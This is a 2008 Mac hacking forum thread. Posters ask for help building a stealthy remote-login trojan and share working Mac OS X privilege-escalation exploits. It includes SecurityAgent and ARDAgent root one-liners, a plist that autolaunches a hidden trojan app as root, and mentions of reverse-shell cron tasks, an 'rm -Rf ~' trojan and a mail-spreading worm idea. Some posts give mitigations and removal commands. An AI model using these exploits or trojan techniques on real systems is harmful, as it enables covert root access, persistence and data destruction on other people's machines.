remote login Trojan, Trying to make a program that will select remote login. Options

[lokin]

******** EDIT Begins **********

6/25/08 EDIT *IMPORTANT* For Visitors:

The following links to our knowledge base contain further information on this subject, including Solutions, Discovery, Templates, and more:
ARDAgent exploit & Com.apple.SystemLoginItems.plist Exploit

- Spratt_

******** EDIT Complete **********


So the deal is I'm trying to write a script that will locate preferences--->sharing--->and then select remote login if there is write privileges.
This will be my first attempt at making something that does this so please give me a break.
what language should I use? perl?
what compiler? Xcode?
The program also has to run in the background or imbed it in a file or document of some kind.
Once again I have no experience here so please help all you can.
p.s. please don't write the code and say heres an example, I'll end up copying most of it.

[Oktane]

CODE

-- If SecurityAgent is open kill it
try
    do shell script "killall SecurityAgent"
end try

-- Setup SecurityAgent
ignoring application responses
    do shell script "sudo -s"
end ignoring

-- Exploit
tell application "SecurityAgent" to do shell script "id"

Output:

"uid=92(securityagent) gid=0(wheel) groups=0(wheel)"

[callmenames]

As we draw closer to the next exploit how about we keep it on the down low, PM, IRC or a thread thats a little less HOT. just a suggestion

I understand what you mean, and I won't disclose anything privately shared with me by someone else. For my purposes though, I probably will continue to openly post any vulnerabilities which I run across myself - because my goal is to get more people interested in programming on Macs and the topic of vulnerabilities brings people in by the droves and gets them interested. Now to get them writing and posting CODE in this forum!... :)

[Oktane]

I was thinking and came up with a funny idea, how about we make an anti-trojan virus. An AppleScript application that fixes permssions on SystemLoginItems.plist and ARDAgent.app and removes the old trojan if it was installed. Then it notifies the user they were patched and spreads through their Mail account if they have one.

Since both of these exploits have been around for the better half of a decade this might just force Apples hand.

This post has been edited by Oktane: Jun 21 2008, 04:41 PM

[callmenames]

That still leaves the dreaded "rm -Rf ~" trojan. GASP!
(For anyone who doesn't already know what that command does...

rm=remove,
-R=recursive meaning all subfolders,
-f=force as in just delete stuff and don't ask me any question,
~=your user home folder.

So the command is essentailly... "remove my home folder and all subfolders inside it and don't ask me any questions" Obviously, its probably not something anyone would want to have happen, so don't run the command.)

You know, more people would probably willingly run your trojan for testing if you posted an "Undo Oktane's Trojan" script too ?

[Oktane]

You know, more people would probably willingly run your trojan for testing if you posted an "Undo Oktane's Trojan" script too ?

Especially if they don't fully understand what it does.

[callmenames]

Exactly! There is a lot of misinformation due to SecureMac's woefully inaccurate press release and the bizarre interpretations thereof by the Internet media sites. So a detailed explanation of what it actually does and how a user could manually do or undo the same things would help a lot of people to understand not just your own trojan but many of the features of Mac OS X in general.

For instance, in "AppleScript trojan horse template" or AStht, are subroutines which add a cron task to run shell scripts for a reverse-shell or reverse-VNC session. Cron is a program included in OS X which runs commands at a scheduled time. More information on cron can be found by opening the Terminal program and typing 'man cron' without the quotes to see the manual page for cron. Apple has a copy of that information available online as well http://developer.apple.com/documentation/D...an8/cron.8.html

A user can see what, if any, entries are listed in the crontab file for the user by running the Terminal program and issuing the command:
crontab -l

All the entries can be easily removed with this command:
crontab -r

That will remove the two cron entries which "AppleScript trojan horse template" or AStht adds to create the reverse-shell and/or reverse VNC session.

This post has been edited by callmenames: Jun 21 2008, 05:32 PM

[Oktane]

So is their anyway to duplicate the MOAB in some form or has that been fully patched? The things is that as long as that SystemLoginItems.plist is around there will always be an exploit, just bugs me.

Exploits that need to get patched:
1. Trojan can create a hidden user (or any other application)
2. ARDAgent exploit
3. SystemLoginItems.plist

[Macpunk]

Everybody who cares has already read this thread twice, and prolly found more anyways. ;-P

--Macpunk

[callmenames]

So is their anyway to duplicate the MOAB in some form or has that been fully patched?

I can personally attest to the fact that some of the vulnerabilities disclosed in the "Month of Apple Bugs" project remain unpatched.
http://projects.info-pull.com/moab/

[Oktane]

UNOFFICIAL FULL DISLOSURE

ARDAgent.app Exploit

AFFECTED: Mac OS X 10.4 - 10.5
Risk: Critical
USAGE: Easy

History: Discovered at http://www.macshadows.com/forums/index.php...8640&st=430 by members callmenames, Wawl, Oktane and andrewtheshit. First implemented in AppleScript but can be ported into Bash (Bourne Again Shell). Used in proof of concept type trojans throughout the thread. Poses high risk for ease of use and lack of experience required. Allows the attacker to run any code, malicious or otherwise. This vulnerability also affects all operating systems released 10.4 and above, because this application is included default.

Usage:
Original Script (AppleScript):

CODE

tell application "ARDAgent.app" to do shell script "id"

Bash Script (Bourne Again Shell):

CODE

osascript -e 'tell application "ARDAgent" to do shell script "id"'

This will give an output of uid 0 or root, the superuser of Unix based computers when run by an administrator. The reason for this vulnerability is that the application ARDAgent.app (located: /Systems/Library/CoreServices/ARDAgent.app) runs as root. An over look or mistake by the programmers and maintainers of Mac OS X. Note that this exploit can only be achieved if the effected user is an administrator.

Solutions: Temporary solutions for the mainstream Mac OS X owner until a patch is released by Apple in a future Software Update. Is to change the permissions of the application ARDAgent.app. This is an easy fix and should be distributed immediately as the trojans specified above have been released into the public.

1. Open Terminal (Menu Bar -> Go -> Utilities -> Terminal.app)
2. Enter:

CODE

cd /Systems/Library/CoreServices

3. Enter:

CODE

sudo chmod u-s ARDAgent

4. You will be prompted to enter your password, do so.
5. Check to make sure that this is working by running the exploit again.
Enter:

CODE

osascript -e 'tell application "ARDAgent" to do shell script "id"'

You should see your username displayed as the uid.

com.apple.SystemLoginItems.plist Exploit

AFFECTED: Mac OS X 10.3 - 10.5
Risk: Medium
USAGE: Medium

History: Made public at http://www.macshadows.com/forums/index.php...8640&st=430 by members callmenames, Lokin, Oktane and andrewtheshit. First implemented in AppleScript but can be ported into Bash (Bourne Again Shell) and other programming languages. Used in proof of concept type trojans throughout the thread. Poses medium risk for medium ease of use and number of computers affected. Allows the attacker to run any code, malicious or otherwise. This exploit has evidently existed for quite some time now (the better half of a decade).

Usage: The file is located in /Library/Preferences/com.apple.SystemLoginItems.plist
Example:

CODE

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>AutoLaunchedApplicationDictionary</key>
    <array>
        <dict>
            <key>Hide</key>
            <true/>
            <key>Path</key>
            <string>/Library/Caches/.trojan.app</string>
        </dict>
    </array>
</dict>
</plist>

The file can be overwritten, edited or replaced. The fault lies in the permissions set upon this file. Allowing anyone to edit the SystemLoginItems.plist. Upon restart the application is then run as a start up item under root or uid 0 the superuser of Unix based computers. A payload for this exploit could be easily created as a compiled AppleScript application (or bundle) which already exists in the wild. The reason for the medium risk also involves the easy detection of the exploit by knowledgeable users. A trojan can hide itself and replace the plist file after use but the user must not detect the attack before restarting the computer. However the trojan might actually restart the computer on its own posing a larger risk but higher rate of detection.

b]Solutions:[/b] Temporary solutions for the mainstream Mac OS X owner until a patch is released by Apple in a future Software Update. Is to change the permissions of the plist file /Library/Preferences/com.apple.SystemLoginItems.plist. This is an easy fix and should be distributed immediately as the trojans specified above have been released into the public.

1. Open Terminal (Menu Bar -> Go -> Utilities -> Terminal.app)
2. Enter:

CODE

cd /Library/Preferences

3. Enter:

CODE

sudo chmod u-s com.apple.SystemLoginItems.plist

4. You will be prompted to enter your password, do so.